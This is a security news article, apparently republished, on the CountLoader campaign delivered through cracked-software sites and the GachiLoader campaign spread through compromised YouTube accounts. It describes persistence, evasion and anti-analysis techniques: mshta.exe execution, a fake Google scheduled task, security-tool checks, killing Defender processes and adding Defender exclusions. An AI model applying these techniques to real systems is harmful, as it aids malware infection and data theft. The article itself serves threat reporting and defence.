Cybersecurity researchers have revealed details of a new campaign that used a cracked software distribution site as a distribution vector for a new version of a modular stealth loader known as CountLoader.
The Cyderes Howler Cell Threat Intelligence team said in its analysis that the campaign “uses CountLoader as the first tool in a multi-stage attack to access, evade, and distribute additional malware families.”
CountLoader has been previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. This loader has been detected in the wild since at least June 2025.
The latest attack chain begins when an unsuspecting user attempts to download a cracked version of legitimate software, such as Microsoft Word, and is redirected to a MediaFire link that hosts a malicious ZIP archive. This archive contains an encrypted ZIP file and a Microsoft Word document with a password to open the second archive.
Inside the ZIP file is a renamed legitimate Python interpreter (‘Setup.exe’). It is configured to run a malicious command that retrieves CountLoader 3.2 from a remote server using ‘mshta.exe’.
To establish persistence, the malware creates a scheduled task that mimics Google using the name “GoogleTaskSystem136.0.7023.12” and an identifier-like string. It is configured to run every 30 minutes for 10 years by calling ‘mshta.exe’ on the fallback domain.
It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is adjusted to “cmd.exe /c start /b mshta.exe”. Otherwise, use “mshta.exe” to access the URL directly.
CountLoader is equipped to profile compromised hosts and fetch the next stage payload. The latest version of this malware adds the ability to propagate via removable USB drives and execute the malware directly in memory via ‘mshta.exe’ or PowerShell. Here is the complete list of supported features:
Downloads and runs an executable file from the specified URL Downloads a ZIP archive from the specified URL and runs any Python-based module or EXE file present within it Downloads a DLL from the specified URL and runs it via ‘rundll32.exe’ Downloads and installs an MSI installer package Removes scheduled tasks used by the loader Collects and extracts extensive system information Spreads via removable media by creating a malicious shortcut (LNK) that executes the original file on startup next to its hidden original counterpart Executes malware via ‘mshta.exe’ with C2 parameters Launches ‘mshta.exe’ directly to the provided URL Executes remote PowerShell payload in memory
In the attack chain observed by Cyderes, the final payload deployed by CountLoader is an information stealer known as ACR Stealer, which has the ability to collect sensitive data from infected hosts.
“This campaign highlights the continued evolution and sophistication of CountLoader, reinforcing the need for proactive detection and defense-in-depth strategies,” Cyderes said. “Its ability to deliver ACR Stealer through a multi-step process ranging from modifying Python libraries to unpacking in-memory shellcode highlights the growing trend of signed binary exploitation and fileless execution tactics.”
YouTube Ghost Network presents GachiLoader
This disclosure comes after Check Point revealed details of a new highly obfuscated JavaScript malware loader written in Node.js called GachiLoader. The malware is distributed through the YouTube Ghost network, a network of compromised YouTube accounts involved in distributing the malware.
“One of the GachiLoader variants deploys a second stage of malware, Kidkadi, which implements a new technique for Portable Executable (PE) injection,” said security researchers Sven Rath and Jaromír Hořejší. “This technique loads a legitimate DLL and exploits vector exception handling to replace it with a malicious payload on the fly.”
As many as 100 YouTube videos were reported as part of the campaign, with approximately 220,000 views. These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. Most of these videos have since been removed by Google.
In at least one case, GachiLoader served as a conduit for the Rhadamanthys information-stealing malware. Like other loaders, GachiLoader is used to deploy additional payloads to infected machines, while running a series of anti-analysis checks to fly under the radar.
Also check if it is running with administrator privileges by running the “net session” command. If execution fails, it attempts to start itself with administrator privileges, which triggers a User Account Control (UAC) prompt. As outlined in the CountLoader case, malware is more likely to be distributed through fake installers of popular software, making it more likely that victims will allow it to continue.
In the final phase, the malware attempts to kill ‘SecHealthUI.exe’, a process associated with Microsoft Defender, and configures Defender exclusions to prevent security solutions from flagging malicious payloads staged in specific folders (C:\Users\, C:\ProgramData\, C:\Windows\).
GachiLoader then either fetches the final payload directly from the remote URL or uses another loader named ‘kidkadi.node’ to load the main malware by exploiting vector exception handling.
“The attackers behind GachiLoader are familiar with the internals of Windows and have devised new variations on known techniques,” Check Point said. “This highlights the need for security researchers to stay up-to-date on malware techniques such as PE injection, and to actively seek new ways for malware authors to try to evade detection.”
Source link
